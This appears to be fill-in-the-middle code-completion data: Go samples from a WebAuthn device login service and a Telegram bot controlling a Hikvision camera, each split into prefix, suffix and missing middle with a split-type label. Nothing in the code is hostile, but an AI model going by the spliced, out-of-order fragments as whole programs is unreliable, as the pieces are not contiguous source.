op.store.users, err = user.NewStore(config.Storage.Storage)
if err != nil {
return nil, fmt.Errorf("failed to open users store: %w", err)
}
return op, nil
}
// GetRESTHandlers get all controller API handler available for this service.
func (o *Operation) GetRESTHandlers() []common.Handler {
return []common.Handler{
common.NewHTTPHandler(registerBeginPath, http.MethodGet, o.beginRegistration),
common.NewHTTPHandler(registerFinishPath, http.MethodPost, o.finishRegistration),
common.NewHTTPHandler(loginBeginPath, http.MethodGet, o.beginLogin),
common.NewHTTPHandler(loginFinishPath, http.MethodPost, o.finishLogin),
}
}
func (o *Operation) beginRegistration(w http.ResponseWriter, r *http.Request) {
logger.Debugf("handling device registration: %s", r.URL.String())
userData, canProceed := o.getUserData(w, r, userSubCookieName)
if !canProceed {
return
}
device := NewDevice(userData)
webAuthnUser := protocol.UserEntity{ | },
}
registerOptions := func(credCreationOpts *protocol.PublicKeyCredentialCreationOptions) {
credCreationOpts.User = webAuthnUser
credCreationOpts.CredentialExcludeList = device.CredentialExcludeList()
credCreationOpts.Attestation = protocol.PreferDirectAttestation
}
// generate PublicKeyCredentialCreationOptions, session data
credentialParams, sessionData, err := o.webauthn.BeginRegistration(
device,
registerOptions,
)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to begin registration %s", err.Error())
return
}
// store session data as marshaled JSON
err = o.store.session.SaveWebauthnSession(userData.Sub, sessionData, r, w)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save web auth session %s", err.Error())
return
}
jsonResponse(w, credentialParams, http.StatusOK)
logger.Debugf("Registration begins")
}
func (o *Operation) finishRegistration(w http.ResponseWriter, r *http.Request) { // nolint:funlen // not clean to split
logger.Debugf("handling finish device registration: %s", r.URL.String())
userData, canProceed := o.getUserData(w, r, userSubCookieName)
if !canProceed {
return
}
sessionData, err := o.store.session.GetWebauthnSession(userData.Sub, r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to get web auth session: %s", err.Error())
return
}
device := NewDevice(userData)
// unfold webauthn.FinishRegistration, to access parsedResponse
parsedResponse, err := protocol.ParseCredentialCreationResponse(r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to finish registration: parsing ccr: %#v", err)
return
}
credential, err := o.webauthn.CreateCredential(device, sessionData, parsedResponse)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to finish registration: cred: %#v", err)
return
}
deviceCerts, ok := parsedResponse.Response.AttestationObject.AttStatement["x5c"].([]interface{})
if ok && len(deviceCerts) > 0 {
err = o.requestDeviceValidation(r.Context(), userData.Sub, string(credential.Authenticator.AAGUID), deviceCerts)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to finish registration: %#v", err)
return
}
} else {
logger.Warnf("credential attestation of format '%s' has no certificates",
parsedResponse.Response.AttestationObject.Format)
}
device.AddCredential(*credential)
err = o.saveDeviceInfo(device)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save device info: %s", err.Error())
return
}
o.saveCookie(w, r, userData.Sub, deviceCookieName)
jsonResponse(w, credential, http.StatusOK)
logger.Debugf("Registration success")
}
func (o *Operation) requestDeviceValidation(ctx context.Context, userSub, aaguid string, certs []interface{}) error {
if len(certs) == 0 {
return fmt.Errorf("missing certs")
}
var certPemList []string
for _, certInterface := range certs {
cert, ok := certInterface.([]byte)
if !ok {
return fmt.Errorf("can't cast certificate data to []byte")
}
certPemList = append(certPemList, string(pem.EncodeToMemory(
&pem.Block{Bytes: cert, Type: "CERTIFICATE"},
)))
}
postData, err := json.Marshal(&struct {
X5c []string `json:"x5c"`
Sub string `json:"sub"`
Aaguid string `json:"aaguid"`
}{
X5c: certPemList,
Sub: userSub,
Aaguid: aaguid,
})
if err != nil {
return fmt.Errorf("failed to marshal cert data: %w", err)
}
req, err := http.NewRequestWithContext(ctx, http.MethodPost, o.hubAuthURL+"/device", bytes.NewBuffer(postData))
if err != nil {
return fmt.Errorf("failed to create request: %w", err)
}
_, _, err = common.SendHTTPRequest(req, o.httpClient, http.StatusOK, nil)
if err != nil {
return fmt.Errorf("failed response from hub-auth/device endpoint: %w", err)
}
return nil
}
func (o *Operation) beginLogin(w http.ResponseWriter, r *http.Request) {
logger.Debugf("handling begin device login: %s", r.URL.String())
// get username
userData, canProceed := o.getUserData(w, r, deviceCookieName)
if !canProceed {
return
}
deviceData, err := o.getDeviceInfo(userData.Sub)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to get device data: %s", err.Error())
return
}
// generate PublicKeyCredentialRequestOptions, session data
options, sessionData, err := o.webauthn.BeginLogin(deviceData)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to begin login: %s", err.Error())
return
}
// store session data as marshaled JSON
err = o.store.session.SaveWebauthnSession(deviceData.ID, sessionData, r, w)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save web auth login session: %s", err.Error())
return
}
logger.Debugf("Login begin success")
jsonResponse(w, options, http.StatusOK)
}
func (o *Operation) finishLogin(w http.ResponseWriter, r *http.Request) {
logger.Debugf("handling finish device login: %s", r.URL.String())
// get username
userData, canProceed := o.getUserData(w, r, deviceCookieName)
if !canProceed {
return
}
deviceData, err := o.getDeviceInfo(userData.Sub)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to get device data: %s", err.Error())
return
}
o.saveCookie(w, r, userData.Sub, userSubCookieName)
// load the session data
sessionData, err := o.store.session.GetWebauthnSession(deviceData.ID, r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to get web auth login session: %s", err.Error())
return
}
_, err = o.webauthn.FinishLogin(deviceData, sessionData, r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusBadRequest, "failed to finish login: %s", err.Error())
return
}
// handle successful login
http.Redirect(w, r, o.walletDashboard, http.StatusFound)
logger.Debugf("Login finish success")
}
func (o *Operation) getUserData(w http.ResponseWriter, r *http.Request, cookieName string) (userData *user.User,
proceed bool) {
cookieSession, err := o.store.cookies.Open(r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to create or decode session cookie: %s", err.Error())
return nil, false
}
userSub, found := cookieSession.Get(cookieName)
if !found {
common.WriteErrorResponsef(w, logger, http.StatusNotFound, "missing device user session cookie")
return nil, false
}
userData, err = o.store.users.Get(fmt.Sprintf("%v", userSub))
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to get user data %s:", err.Error())
return nil, false
}
displayName := strings.Split(fmt.Sprintf("%v", userSub), "@")[0]
userData.FamilyName = displayName
return userData, true
}
func (o *Operation) saveCookie(w http.ResponseWriter, r *http.Request, usr, cookieName string) {
logger.Debugf("device cookie begin %s", usr)
deviceSession, err := o.store.cookies.Open(r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to read user session cookie: %s", err.Error())
return
}
deviceSession.Set(cookieName, usr)
err = deviceSession.Save(r, w)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save device cookie: %s", err.Error())
return
}
}
func (o *Operation) saveDeviceInfo(device *Device) error {
deviceBytes, err := json.Marshal(device)
if err != nil {
return fmt.Errorf("failed to marshall the device data: %w", err)
}
err = o.store.storage.Put(device.ID, deviceBytes)
if err != nil {
return fmt.Errorf("failed to save the device data: %w", err)
}
return nil
}
func (o *Operation) getDeviceInfo(username string) (*Device, error) {
// fetch user and check if user doesn't exist
userData, err := o.store.users.Get(username)
if err != nil {
return nil, fmt.Errorf("failed to get user: %w", err)
}
deviceDataBytes, err := o.store.storage.Get(userData.Sub)
if err != nil {
return nil, fmt.Errorf("failed to fetch device data: %w", err)
}
deviceData := &Device{}
err = json.Unmarshal(deviceDataBytes, deviceData)
if err != nil {
return nil, fmt.Errorf("failed to unmarshall device data: %w", err)
}
return deviceData, nil
}
func jsonResponse(w http.ResponseWriter, resp interface{}, c int) {
respBytes, err := json.Marshal(resp)
if err != nil {
http.Error(w, "Error creating JSON response", http.StatusInternalServerError)
}
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(c)
fmt.Fprintf(w, "%s", respBytes)
} | ID: device.WebAuthnID(),
DisplayName: device.WebAuthnDisplayName(),
CredentialEntity: protocol.CredentialEntity{
Name: device.WebAuthnName(), | random_line_split |
main.go | package main
import (
"encoding/json"
"flag"
"fmt"
"image"
"image/color"
"image/draw"
"image/jpeg"
"log"
"math"
"os"
"path/filepath"
"strconv"
"strings"
"time"
"github.com/google/uuid"
"github.com/sarjsheff/hiklib"
ffmpeg "github.com/u2takey/ffmpeg-go"
tb "gopkg.in/tucnak/telebot.v2"
)
var ipParam = flag.String("c", "", "Camera IP address.")
var userParam = flag.String("u", "", "Username.")
var passParam = flag.String("p", "", "Password.")
var tkeyParam = flag.String("t", "", "Telegram key.")
var adminParam = flag.Int("a", 0, "Telegram userid.")
var alarmParam = flag.Int("b", 7200, "Alarm port.")
var datadirParam = flag.String("d", "/tmp", "Data dir, default: /tmp .")
var previewsizeParam = flag.Int("s", 20000000, "Video preview byte size.")
var zParam = flag.Int("z", 2, "Video preview rescale (divide).")
var x1Param = flag.Bool("x1", false, "Issue 1.")
// type AlarmItem struct {
// IP string
// Command int
// AlarmType int
// }
type FFProbe struct {
Streams []map[string]interface{} `json:"streams"`
Format map[string]interface{} `json:"format"`
}
var appid uuid.UUID = uuid.Must(uuid.NewRandom())
var motions chan hiklib.AlarmItem
// var dev = C.DevInfo{byStartChan: 0}
// var user = C.int(-1)
var dev = hiklib.DevInfo{ByStartChan: 0}
var user = -1
type touser string
type MotionArea struct{ x, y, w, h float32 }
func (t touser) Recipient() string {
return string(t)
}
// //export onmessagev30
// func onmessagev30(command C.int, pAlarmer *C.NET_DVR_ALARMER, pAlarmInfo *C.char, dwBufLen C.uint, pUserData unsafe.Pointer) {
// i := AlarmItem{IP: C.GoString(&pAlarmer.sDeviceIP[0]), Command: int(command)}
// switch int(command) {
// case COMM_ALARM_V30:
// log.Println("ALARM")
// i.AlarmType = int(C.getalarminfo(pAlarmInfo).dwAlarmType)
// motions <- i
// break
// case COMM_DEV_STATUS_CHANGED:
// log.Printf("COMM_DEV_STATUS_CHANGED")
// break
// default:
// log.Printf("Unknown Alarm [0x%x] !!!", command)
// }
// }
// //export onmessage
// func onmessage(command C.int, ip *C.char, data *C.char, ln C.uint) C.int {
// i := AlarmItem{IP: C.GoString(ip), Command: int(command)}
// switch int(command) {
// case COMM_ALARM_V30:
// i.AlarmType = int(C.getalarminfo(data).dwAlarmType)
// motions <- i
// break
// case COMM_DEV_STATUS_CHANGED:
// log.Printf("COMM_DEV_STATUS_CHANGED %s %s", C.GoString(ip), C.GoString(data))
// break
// default:
// log.Printf("Unknown Alarm [0x%x] %s %s !!!", command, C.GoString(ip), C.GoString(data))
// }
// return 1
// }
func bot() {
videolist := map[string]string{}
done := make(chan int, 1)
done <- 1
admin := touser(strconv.Itoa(*adminParam))
b, err := tb.NewBot(tb.Settings{
Token: *tkeyParam,
Poller: &tb.LongPoller{Timeout: 10 * time.Second},
})
if err != nil {
log.Fatal(err)
return
}
// var menu = &tb.ReplyMarkup{ResizeReplyKeyboard: true}
// var btnSettings = menu.Data("⚙", "Settings")
video := func(offset int, limit int) {
//var v = hiklib.MotionVideos{} //C.MotionVideos{}
mm, _ := b.Send(admin, "Fetch video from camera...")
//C.HListVideo(C.int(user), &v)
_, v := hiklib.HikListVideo(user)
b.Edit(mm, strconv.Itoa(v.Count)+" video on camera.")
if v.Count > 0 {
txt := ""
if offset == 0 {
txt = fmt.Sprintf("First %d video:\n", limit)
} else {
txt = fmt.Sprintf("%d video from %d :\n", limit, offset)
}
for i := offset - 1; i < v.Count && i < offset+limit-1; i++ {
dt := time.Date(v.Videos[i].From_year, time.Month(v.Videos[i].From_month), v.Videos[i].From_day, v.Videos[i].From_hour, v.Videos[i].From_min, v.Videos[i].From_sec, 0, time.UTC)
todt := time.Date(v.Videos[i].To_year, time.Month(v.Videos[i].To_month), v.Videos[i].To_day, v.Videos[i].To_hour, v.Videos[i].To_min, v.Videos[i].To_sec, 0, time.UTC)
txt = txt + "<b>" + dt.Format("2006-01-02 15:04:05") + " - " + todt.Format("15:04:05") + "</b> /dl_" + v.Videos[i].Filename + " \n"
videolist[v.Videos[i].Filename] = dt.Format("2006-01-02/15:04:05")
}
if offset+limit < v.Count {
txt = txt + fmt.Sprintf("<b>Next 10 video /video_%d_%d</b>\n", offset+limit, limit)
}
// menu.Inline(menu.Row(btnSettings))
// b.Send(admin, txt, &tb.SendOptions{ReplyMarkup: menu, ParseMode: tb.ModeHTML})
_, err = b.Send(admin, txt, &tb.SendOptions{ParseMode: tb.ModeHTML})
if err != nil {
log.Println(err)
}
}
}
snapshot := func(mareas bool) {
fname := filepath.Join(*datadirParam, fmt.Sprintf("%s.jpeg", uuid.Must(uuid.NewRandom()).String()))
err := hiklib.HikCaptureImage(user, dev.ByStartChan, fname)
if err > -1 {
caption := ""
if mareas {
// var ma = C.MotionAreas{}
// C.HMotionArea(C.int(user), &ma)
_, ma := hiklib.HikMotionArea(user)
col := color.RGBA{255, 0, 0, 128}
var dst *image.RGBA
var b image.Rectangle
f, err := os.Open(fname)
if err == nil {
defer f.Close()
img, _, err := image.Decode(f)
if err == nil {
b = img.Bounds()
dst = image.NewRGBA(image.Rect(0, 0, b.Dx(), b.Dy()))
draw.Draw(dst, b, img, b.Min, draw.Src)
}
}
caption = caption + fmt.Sprintf("Image size %vx%v\n", b.Dx(), b.Dy())
for i := 0; i < 8; i++ {
if ma.Areas[i].W > 0 && ma.Areas[i].H > 0 {
x, y, w, h := int(float32(b.Dx())*float32(ma.Areas[i].X)), int(float32(b.Dy())*float32(ma.Areas[i].Y)), int(float32(b.Dx())*float32(ma.Areas[i].W)), int(float32(b.Dy())*float32(ma.Areas[i].H))
log.Printf("Area %v x:%v y:%v [%vx%v]\n", i+1, x, y, w, h)
caption = caption + fmt.Sprintf("Area %v x:%v y:%v [%vx%v]\n", i+1, x, y, w, h)
if dst != nil {
Rect(dst, x, y, w, h, col)
}
}
}
if dst != nil {
f.Close()
f, err = os.Create(fname)
if err == nil {
defer f.Close()
opt := jpeg.Options{
Quality: 100,
}
err = jpeg.Encode(f, dst, &opt)
}
}
}
//p := &tb.Photo{File: tb.FromDisk(fname)}
//b.SendAlbum(admin, tb.Album{p})
p := &tb.Document{File: tb.FromDisk(fname), MIME: "image/jpeg", FileName: time.Now().Format(time.RFC3339) + ".jpeg"}
if caption != "" {
p.Caption = caption
}
b.Send(admin, p)
os.Remove(fname)
} else {
b.Send(admin, fmt.Sprintf("Error get snapshot [%d].", err))
}
}
// On inline button pressed (callback)
// b.Handle(&btnSettings, func(c *tb.Callback) {
// b.Respond(c, &tb.CallbackResponse{Text: "testttt"})
// })
b.Handle("/video", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
video(1, 10)
}
done <- 1
})
b.Handle("/mareas", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
snapshot(true)
}
done <- 1
})
b.Handle("/snap", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
snapshot(false)
}
done <- 1
})
b.Handle("/reboot", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
res := hiklib.HikReboot(user)
if res > 0 {
b.Send(m.Sender, "Rebooting! Wait 10 sec.")
time.Sleep(10 * time.Second)
for Login() < 1 {
| b.Send(m.Sender, "Camera online.")
} else {
b.Send(m.Sender, fmt.Sprintf("Fail [%d].", res))
}
}
done <- 1
})
b.Handle(tb.OnText, func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
if strings.HasPrefix(m.Text, "/dl_") {
mm, _ := b.Send(admin, "Loading...")
log.Println(m.Text[4:])
if filename, ok := videolist[m.Text[4:]]; ok {
os.MkdirAll(filepath.Join(*datadirParam, strings.Split(filename, "/")[0]), 0755)
fname := filepath.Join(*datadirParam, filename+".mpeg")
p := &tb.Video{}
if _, err := os.Stat(fname); os.IsNotExist(err) {
opts := ffmpeg.KwArgs{
"format": "mp4",
//"fs": strconv.Itoa(*previewsizeParam),
"vcodec": "copy", //"libx264",
"preset": "ultrafast",
"acodec": "none",
"movflags": "+faststart",
}
// C.HSaveFile(C.int(user), C.CString(m.Text[4:]), C.CString(fname))
hiklib.HikSaveFile(user, m.Text[4:], fname)
b.Edit(mm, "Probing...")
f, err := ffmpeg.Probe(fname)
var fjson FFProbe
err = json.Unmarshal([]byte(f), &fjson)
if err == nil {
// b.Send(admin, f)
p.Width = int(fjson.Streams[0]["width"].(float64))
p.Height = int(fjson.Streams[0]["height"].(float64))
if sz, err := strconv.Atoi(fjson.Format["size"].(string)); err == nil {
if sz > *previewsizeParam {
if s, err := strconv.ParseFloat(fjson.Format["duration"].(string), 64); err == nil {
opts["vcodec"] = "libx264"
opts["b"] = strconv.Itoa(int(math.Floor(float64(*previewsizeParam)/math.Floor(s)) * 8))
p.Width = int(math.Round(float64(p.Width) / float64(*zParam)))
p.Height = int(math.Round(float64(p.Height) / float64(*zParam)))
opts["vf"] = fmt.Sprintf("scale=%d:%d", p.Width, p.Height)
//opts["vf"] = "scale=iw/2:ih/2"
log.Println("Change bitrate", opts["b"])
}
}
}
} else {
log.Println(err)
}
b.Edit(mm, "Transcoding ...")
err = ffmpeg.Input(fname).
Output(fname+".mp4", opts).OverWriteOutput().
Run()
if err != nil {
log.Println(err)
}
} else {
b.Edit(mm, "Probing...")
f, err := ffmpeg.Probe(fname)
var fjson FFProbe
err = json.Unmarshal([]byte(f), &fjson)
if err == nil {
p.Width = int(fjson.Streams[0]["width"].(float64))
p.Height = int(fjson.Streams[0]["height"].(float64))
} else {
log.Println(err)
}
}
b.Edit(mm, "Sending...")
p.File = tb.FromDisk(fname + ".mp4")
p.FileName = "video.mp4"
b.Send(admin, p)
b.Delete(mm)
if *datadirParam == "/tmp" {
os.Remove(fname)
os.Remove(fname + ".mp4")
}
} else {
b.Send(admin, "Not found.")
}
} else if strings.HasPrefix(m.Text, "/video_") {
args := strings.Split(m.Text[7:], "_")
if len(args) > 1 {
offset, err := strconv.Atoi(args[0])
if err == nil {
limit, err := strconv.Atoi(args[1])
if err == nil && offset > -1 && limit > 0 {
video(offset, limit)
}
}
}
}
}
done <- 1
})
go func() {
for {
i := <-motions
if i.AlarmType == 3 {
snapshot(false)
} else {
log.Println(i)
}
}
}()
b.Send(admin, "Bot restart!")
b.Start()
}
func Login() int {
// user = C.HLogin(C.CString(*ipParam), C.CString(*userParam), C.CString(*passParam), &dev)
user, dev = hiklib.HikLogin(*ipParam, *userParam, *passParam)
if int(user) > -1 {
if *x1Param {
hiklib.HikOnAlarmV30(user, *alarmParam, func(item hiklib.AlarmItem) {
motions <- item
})
} else {
hiklib.HikOnAlarm(user, *alarmParam, func(item hiklib.AlarmItem) {
motions <- item
})
}
return int(user)
} else {
return int(user)
}
}
func main() {
log.Println("HIKBOT v0.0.4")
flag.Parse()
if *ipParam == "" || *userParam == "" || *passParam == "" || *adminParam == 0 || *tkeyParam == "" {
flag.PrintDefaults()
} else {
motions = make(chan hiklib.AlarmItem, 100)
log.Printf("%s\n", hiklib.HikVersion())
if Login() > -1 {
defer hiklib.HikLogout(user)
bot()
} else {
log.Println("Error login.")
}
}
}
| b.Send(m.Sender, "Wait 3 sec.")
time.Sleep(3 * time.Second)
}
| conditional_block |
main.go | package main
import (
"encoding/json"
"flag"
"fmt"
"image"
"image/color"
"image/draw"
"image/jpeg"
"log"
"math"
"os"
"path/filepath"
"strconv"
"strings"
"time"
"github.com/google/uuid"
"github.com/sarjsheff/hiklib"
ffmpeg "github.com/u2takey/ffmpeg-go"
tb "gopkg.in/tucnak/telebot.v2"
)
var ipParam = flag.String("c", "", "Camera IP address.")
var userParam = flag.String("u", "", "Username.")
var passParam = flag.String("p", "", "Password.")
var tkeyParam = flag.String("t", "", "Telegram key.")
var adminParam = flag.Int("a", 0, "Telegram userid.")
var alarmParam = flag.Int("b", 7200, "Alarm port.")
var datadirParam = flag.String("d", "/tmp", "Data dir, default: /tmp .")
var previewsizeParam = flag.Int("s", 20000000, "Video preview byte size.")
var zParam = flag.Int("z", 2, "Video preview rescale (divide).")
var x1Param = flag.Bool("x1", false, "Issue 1.")
// type AlarmItem struct {
// IP string
// Command int
// AlarmType int
// }
type FFProbe struct {
Streams []map[string]interface{} `json:"streams"`
Format map[string]interface{} `json:"format"`
}
var appid uuid.UUID = uuid.Must(uuid.NewRandom())
var motions chan hiklib.AlarmItem
// var dev = C.DevInfo{byStartChan: 0}
// var user = C.int(-1)
var dev = hiklib.DevInfo{ByStartChan: 0}
var user = -1
type touser string
type MotionArea struct{ x, y, w, h float32 }
func (t touser) | () string {
return string(t)
}
// //export onmessagev30
// func onmessagev30(command C.int, pAlarmer *C.NET_DVR_ALARMER, pAlarmInfo *C.char, dwBufLen C.uint, pUserData unsafe.Pointer) {
// i := AlarmItem{IP: C.GoString(&pAlarmer.sDeviceIP[0]), Command: int(command)}
// switch int(command) {
// case COMM_ALARM_V30:
// log.Println("ALARM")
// i.AlarmType = int(C.getalarminfo(pAlarmInfo).dwAlarmType)
// motions <- i
// break
// case COMM_DEV_STATUS_CHANGED:
// log.Printf("COMM_DEV_STATUS_CHANGED")
// break
// default:
// log.Printf("Unknown Alarm [0x%x] !!!", command)
// }
// }
// //export onmessage
// func onmessage(command C.int, ip *C.char, data *C.char, ln C.uint) C.int {
// i := AlarmItem{IP: C.GoString(ip), Command: int(command)}
// switch int(command) {
// case COMM_ALARM_V30:
// i.AlarmType = int(C.getalarminfo(data).dwAlarmType)
// motions <- i
// break
// case COMM_DEV_STATUS_CHANGED:
// log.Printf("COMM_DEV_STATUS_CHANGED %s %s", C.GoString(ip), C.GoString(data))
// break
// default:
// log.Printf("Unknown Alarm [0x%x] %s %s !!!", command, C.GoString(ip), C.GoString(data))
// }
// return 1
// }
func bot() {
videolist := map[string]string{}
done := make(chan int, 1)
done <- 1
admin := touser(strconv.Itoa(*adminParam))
b, err := tb.NewBot(tb.Settings{
Token: *tkeyParam,
Poller: &tb.LongPoller{Timeout: 10 * time.Second},
})
if err != nil {
log.Fatal(err)
return
}
// var menu = &tb.ReplyMarkup{ResizeReplyKeyboard: true}
// var btnSettings = menu.Data("⚙", "Settings")
video := func(offset int, limit int) {
//var v = hiklib.MotionVideos{} //C.MotionVideos{}
mm, _ := b.Send(admin, "Fetch video from camera...")
//C.HListVideo(C.int(user), &v)
_, v := hiklib.HikListVideo(user)
b.Edit(mm, strconv.Itoa(v.Count)+" video on camera.")
if v.Count > 0 {
txt := ""
if offset == 0 {
txt = fmt.Sprintf("First %d video:\n", limit)
} else {
txt = fmt.Sprintf("%d video from %d :\n", limit, offset)
}
for i := offset - 1; i < v.Count && i < offset+limit-1; i++ {
dt := time.Date(v.Videos[i].From_year, time.Month(v.Videos[i].From_month), v.Videos[i].From_day, v.Videos[i].From_hour, v.Videos[i].From_min, v.Videos[i].From_sec, 0, time.UTC)
todt := time.Date(v.Videos[i].To_year, time.Month(v.Videos[i].To_month), v.Videos[i].To_day, v.Videos[i].To_hour, v.Videos[i].To_min, v.Videos[i].To_sec, 0, time.UTC)
txt = txt + "<b>" + dt.Format("2006-01-02 15:04:05") + " - " + todt.Format("15:04:05") + "</b> /dl_" + v.Videos[i].Filename + " \n"
videolist[v.Videos[i].Filename] = dt.Format("2006-01-02/15:04:05")
}
if offset+limit < v.Count {
txt = txt + fmt.Sprintf("<b>Next 10 video /video_%d_%d</b>\n", offset+limit, limit)
}
// menu.Inline(menu.Row(btnSettings))
// b.Send(admin, txt, &tb.SendOptions{ReplyMarkup: menu, ParseMode: tb.ModeHTML})
_, err = b.Send(admin, txt, &tb.SendOptions{ParseMode: tb.ModeHTML})
if err != nil {
log.Println(err)
}
}
}
snapshot := func(mareas bool) {
fname := filepath.Join(*datadirParam, fmt.Sprintf("%s.jpeg", uuid.Must(uuid.NewRandom()).String()))
err := hiklib.HikCaptureImage(user, dev.ByStartChan, fname)
if err > -1 {
caption := ""
if mareas {
// var ma = C.MotionAreas{}
// C.HMotionArea(C.int(user), &ma)
_, ma := hiklib.HikMotionArea(user)
col := color.RGBA{255, 0, 0, 128}
var dst *image.RGBA
var b image.Rectangle
f, err := os.Open(fname)
if err == nil {
defer f.Close()
img, _, err := image.Decode(f)
if err == nil {
b = img.Bounds()
dst = image.NewRGBA(image.Rect(0, 0, b.Dx(), b.Dy()))
draw.Draw(dst, b, img, b.Min, draw.Src)
}
}
caption = caption + fmt.Sprintf("Image size %vx%v\n", b.Dx(), b.Dy())
for i := 0; i < 8; i++ {
if ma.Areas[i].W > 0 && ma.Areas[i].H > 0 {
x, y, w, h := int(float32(b.Dx())*float32(ma.Areas[i].X)), int(float32(b.Dy())*float32(ma.Areas[i].Y)), int(float32(b.Dx())*float32(ma.Areas[i].W)), int(float32(b.Dy())*float32(ma.Areas[i].H))
log.Printf("Area %v x:%v y:%v [%vx%v]\n", i+1, x, y, w, h)
caption = caption + fmt.Sprintf("Area %v x:%v y:%v [%vx%v]\n", i+1, x, y, w, h)
if dst != nil {
Rect(dst, x, y, w, h, col)
}
}
}
if dst != nil {
f.Close()
f, err = os.Create(fname)
if err == nil {
defer f.Close()
opt := jpeg.Options{
Quality: 100,
}
err = jpeg.Encode(f, dst, &opt)
}
}
}
//p := &tb.Photo{File: tb.FromDisk(fname)}
//b.SendAlbum(admin, tb.Album{p})
p := &tb.Document{File: tb.FromDisk(fname), MIME: "image/jpeg", FileName: time.Now().Format(time.RFC3339) + ".jpeg"}
if caption != "" {
p.Caption = caption
}
b.Send(admin, p)
os.Remove(fname)
} else {
b.Send(admin, fmt.Sprintf("Error get snapshot [%d].", err))
}
}
// On inline button pressed (callback)
// b.Handle(&btnSettings, func(c *tb.Callback) {
// b.Respond(c, &tb.CallbackResponse{Text: "testttt"})
// })
b.Handle("/video", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
video(1, 10)
}
done <- 1
})
b.Handle("/mareas", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
snapshot(true)
}
done <- 1
})
b.Handle("/snap", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
snapshot(false)
}
done <- 1
})
b.Handle("/reboot", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
res := hiklib.HikReboot(user)
if res > 0 {
b.Send(m.Sender, "Rebooting! Wait 10 sec.")
time.Sleep(10 * time.Second)
for Login() < 1 {
b.Send(m.Sender, "Wait 3 sec.")
time.Sleep(3 * time.Second)
}
b.Send(m.Sender, "Camera online.")
} else {
b.Send(m.Sender, fmt.Sprintf("Fail [%d].", res))
}
}
done <- 1
})
b.Handle(tb.OnText, func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
if strings.HasPrefix(m.Text, "/dl_") {
mm, _ := b.Send(admin, "Loading...")
log.Println(m.Text[4:])
if filename, ok := videolist[m.Text[4:]]; ok {
os.MkdirAll(filepath.Join(*datadirParam, strings.Split(filename, "/")[0]), 0755)
fname := filepath.Join(*datadirParam, filename+".mpeg")
p := &tb.Video{}
if _, err := os.Stat(fname); os.IsNotExist(err) {
opts := ffmpeg.KwArgs{
"format": "mp4",
//"fs": strconv.Itoa(*previewsizeParam),
"vcodec": "copy", //"libx264",
"preset": "ultrafast",
"acodec": "none",
"movflags": "+faststart",
}
// C.HSaveFile(C.int(user), C.CString(m.Text[4:]), C.CString(fname))
hiklib.HikSaveFile(user, m.Text[4:], fname)
b.Edit(mm, "Probing...")
f, err := ffmpeg.Probe(fname)
var fjson FFProbe
err = json.Unmarshal([]byte(f), &fjson)
if err == nil {
// b.Send(admin, f)
p.Width = int(fjson.Streams[0]["width"].(float64))
p.Height = int(fjson.Streams[0]["height"].(float64))
if sz, err := strconv.Atoi(fjson.Format["size"].(string)); err == nil {
if sz > *previewsizeParam {
if s, err := strconv.ParseFloat(fjson.Format["duration"].(string), 64); err == nil {
opts["vcodec"] = "libx264"
opts["b"] = strconv.Itoa(int(math.Floor(float64(*previewsizeParam)/math.Floor(s)) * 8))
p.Width = int(math.Round(float64(p.Width) / float64(*zParam)))
p.Height = int(math.Round(float64(p.Height) / float64(*zParam)))
opts["vf"] = fmt.Sprintf("scale=%d:%d", p.Width, p.Height)
//opts["vf"] = "scale=iw/2:ih/2"
log.Println("Change bitrate", opts["b"])
}
}
}
} else {
log.Println(err)
}
b.Edit(mm, "Transcoding ...")
err = ffmpeg.Input(fname).
Output(fname+".mp4", opts).OverWriteOutput().
Run()
if err != nil {
log.Println(err)
}
} else {
b.Edit(mm, "Probing...")
f, err := ffmpeg.Probe(fname)
var fjson FFProbe
err = json.Unmarshal([]byte(f), &fjson)
if err == nil {
p.Width = int(fjson.Streams[0]["width"].(float64))
p.Height = int(fjson.Streams[0]["height"].(float64))
} else {
log.Println(err)
}
}
b.Edit(mm, "Sending...")
p.File = tb.FromDisk(fname + ".mp4")
p.FileName = "video.mp4"
b.Send(admin, p)
b.Delete(mm)
if *datadirParam == "/tmp" {
os.Remove(fname)
os.Remove(fname + ".mp4")
}
} else {
b.Send(admin, "Not found.")
}
} else if strings.HasPrefix(m.Text, "/video_") {
args := strings.Split(m.Text[7:], "_")
if len(args) > 1 {
offset, err := strconv.Atoi(args[0])
if err == nil {
limit, err := strconv.Atoi(args[1])
if err == nil && offset > -1 && limit > 0 {
video(offset, limit)
}
}
}
}
}
done <- 1
})
go func() {
for {
i := <-motions
if i.AlarmType == 3 {
snapshot(false)
} else {
log.Println(i)
}
}
}()
